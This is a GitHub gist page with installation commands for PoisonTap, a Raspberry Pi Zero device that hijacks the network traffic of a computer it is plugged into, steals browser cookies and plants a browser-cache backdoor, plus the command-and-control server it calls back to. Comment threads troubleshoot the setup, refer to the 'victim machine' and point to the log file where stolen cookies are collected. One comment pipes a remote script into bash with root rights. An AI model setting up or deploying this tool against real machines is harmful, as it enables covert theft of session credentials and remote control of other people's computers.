Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoisonTap Install Commands
##Server:
sudo apt-get update && apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js
##piZero:
sudo apt-get update && apt-get upgrade
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git
git clone https://github.com/samyk/poisontap
Update ws://YOUR.DOMAIN:1337 in backdoor.html to your public IP
ws://poisontap.jgamblin.com:1337
#add this to /etc/network/interfaces:
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 1.0.0.1
netmask 0.0.0.0
#Setup to run at boot:
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh
add this to /etc/rc.local right above exit 0:
/etc/init.d/pi_startup.sh &
#DHCP:
sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
add this to /etc/default/isc-dhcp-server:
INTERFACES="usb0"
@Uniquellama

This comment has been minimized.

Copy link

commented Nov 20, 2016

So I did everything under the "piZero" and "Setup to run at Boot" categories. I'm assuming theres no reason to set up Server as I am not running a server however would I do what is under the DHCP tag on the piZero or would this be done somewhere else? From what I have done in the second and third category it does nothing when plugged into a Mac or Windows. I did this on Raspbian.

@Stephen2929

This comment has been minimized.

Copy link

commented Nov 20, 2016

I assume the Pi zero gadget mode also need to be set up eg modules-load=dwc2,g_ether etc ? or does the writing to /sys/kernel/config/usb_gadget/ superceed that ?

@BustedSec

This comment has been minimized.

Copy link

commented Nov 20, 2016

for it to work correctly, you need the server component to catch the backdoor it installs in the browser cache. you don't need an actual "server" just any internet facing box with ports open. a VPS would do fine.

@BustedSec

This comment has been minimized.

Copy link

commented Nov 20, 2016

You need to set the pi zero to run DHCP on the usb0 ethernet port - so in order to do that you need to make the modifications mentioned under #DHCP section

@Stephen2929

This comment has been minimized.

Copy link

commented Nov 20, 2016

$ echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
$ echo "dwc2" | sudo tee -a /etc/modules
$ sudo echo "libcomposite" | sudo tee -a /etc/modules
//dont need the modules-load=dwc2,g_ether in /boot/cmdline.txt [thats the old g_ether way]

@Stephen2929

This comment has been minimized.

Copy link

commented Nov 20, 2016

dhcp correction: copy the poisontap/dhcpd.conf to /etc/dhcp/dhcpd.conf

@Uniquellama

This comment has been minimized.

Copy link

commented Nov 20, 2016

My issue is that the pi is not recognized by any computer when I plug it in anyway. I made the changed under #DHCP but computer's don't pick up any Ethernet port when I plug the pi in. I've tried both micro usb ports on the pi.

@Stephen2929

This comment has been minimized.

Copy link

commented Nov 21, 2016

Try with the Pi zero connected to a hdmi screen. Do you see it setting up a usb0 device, or do you see errors? I'm still getting cant cd to /sys/kernel/config/usb_gadget and no usb0 device -- update: working now as CDC ECM device
Update2 - latest install notes sets it up a g_ether remote ndis device

@ticarpi

This comment has been minimized.

Copy link

commented Nov 24, 2016

I'm also having issues bringing up the usb0 device.
Getting the error "cant cd to /sys/kernel/config/usb_gadget" from the /etc/init.d/pi_startup.sh script

I followed all the instructions in pi.txt above.
How to set up as CDC ECM device (if that would help)?

@muhackl

This comment has been minimized.

Copy link

commented Nov 25, 2016

I am getting the following when trying to start the backend_server.js via sudo node backend_sever.js on my server (that is actually another raspberry pi). What am I doing wrong?

/home/pi/backend_server.js:9
var server = http.createServer((request, response) => {
^
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:906:3

@Nz05012000

This comment has been minimized.

Copy link

commented Nov 26, 2016

I have the same problem muhack!

@NotSethGreen

This comment has been minimized.

Copy link

commented Nov 27, 2016

Everything worked for me from ##PiZero onward.
My issue is, it connects as an ethernet device, greenlights, reads connected, but it just stops all web traffic dead.

The browser will read "resolving host" and then eventually just give me a "there is no internet connection" error.

I've followed the steps multiple times to the same results.

@muhackl

This comment has been minimized.

Copy link

commented Nov 27, 2016

@Nz05012000 I solved it the following way:
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt-get install nodejs

After the latest version of node (7.2) is installed, the backend_server.js starts!

@Nz05012000

This comment has been minimized.

Copy link

commented Nov 27, 2016

@muhacl Thank you, that helped me!)

@danthegoodman1

This comment has been minimized.

Copy link

commented Nov 29, 2016

Question: for the ws://YOUR.DOMAIN:1337 do you have to have something like poisontap.whatever.com:1337 or can you just use an external ip like ##.##.###.###:1337 kind of deal? Is the subdomain pointing to anything in particular? Or as long as it is all consistent across the pi and the server that a bare ip would be ok? (the ##.## stuff)

@ajdulion

This comment has been minimized.

Copy link

commented Dec 1, 2016

hmm..

I setup my raspberry zero using the usb route (so no screen)

getting the following errors when running the startup

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

@danthegoodman1

This comment has been minimized.

Copy link

commented Dec 1, 2016

The thing that immediately jumps out to me is the "Device or resource busy" line. Unfortunately if the case is that it is because it is being used, then the only way to solve it would be to edit that file before it is inserted into the pi. the only way to stop the ONLY usb port is to not use it, but the pi does not have integrated wifi that you could ssh into. I am by no means an expert on this, but that is what jumps out to me. I have not run that part of the installation yet, so I do not know if I will run into it or not.

@danthegoodman1

This comment has been minimized.

Copy link

commented Dec 1, 2016

I am also wondering why this installation does not include anything about activating the g_eth. Like in this tutorial (found through the poisontap github) samyk/poisontap@068c283

@ajdulion

This comment has been minimized.

Copy link

commented Dec 2, 2016

wel it seems to run, but now i have no clue where to find the cookies on my test setup this tool is missing some manual/tutorials i'm guessing..

@Stephen2929

This comment has been minimized.

Copy link

commented Dec 2, 2016

poisontap/poisontap.cookies.log

@danthegoodman1

This comment has been minimized.

Copy link

commented Dec 2, 2016

@Stephen2929 have you had success with the server side? (I finally got it working, the tutorial above is not very good, not to everyone: use the link I posted, and do part 2 before part 1) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like and alert command, nothing happens on the victim machine. Going through all of the logs I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist. Any help would be greatly appreciated.

Edit: Update

@rinkunamaste

This comment has been minimized.

Copy link

commented Dec 9, 2016

I tried all steps describe in pi.txt but raspberry pi zero is not able to create a virtual Ethernet port on windows 7 and windows 10. anyone else had same problem and sorted out? i will appreciate for any response. thanks

@himuura

This comment has been minimized.

Copy link

commented Dec 10, 2016

Same issue...followed all the pi.txt steps and still i havent got a new Ethernet device. Both on Windows 7,8.1 and 10. Perhaps some step missing?

@mkmxu

This comment has been minimized.

Copy link

commented Dec 12, 2016

When I type "git clone https://github.com/samyk/poisontap"

I get this response

Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

is this something I've done or on github side? or what? Thank you in advance for your help.

@gabyavra

This comment has been minimized.

Copy link

commented Dec 21, 2016

I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?

UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong, I don't know if the ethernet emulation or DHCP, since both seems to work fine at first preview. I think the ethernet emulation was to blame, since the ping between computer and raspberry didn't work, either I configured the computer with statical IP address!

@gersey2002

This comment has been minimized.

Copy link

commented Jan 11, 2017

does anyone have a tutorial on getting the back end server running I'm not having any luck with it

@eliddell1

This comment has been minimized.

Copy link

commented Mar 14, 2017

I too am getting this error on start up:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

can someone please help @ajdulion how did you get this working?

@theCake75

This comment has been minimized.

Copy link

commented Jun 11, 2017

@eliddell1 @ajdulion i have exactly the same problem, can you help me please ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.